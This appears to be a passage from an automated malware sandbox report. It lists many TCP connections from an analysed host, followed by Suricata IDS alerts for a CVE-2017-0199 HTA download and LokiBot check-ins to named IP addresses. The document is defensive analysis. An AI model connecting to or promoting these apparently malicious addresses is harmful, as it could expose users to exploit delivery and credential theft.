Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.243.136:80

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.243.136:80 -> 192.168.2.22:49162
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49172 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.243.136:80 -> 192.168.2.22:49164
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49172 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49172 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49168 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49168 -> 94.156.177.41:80
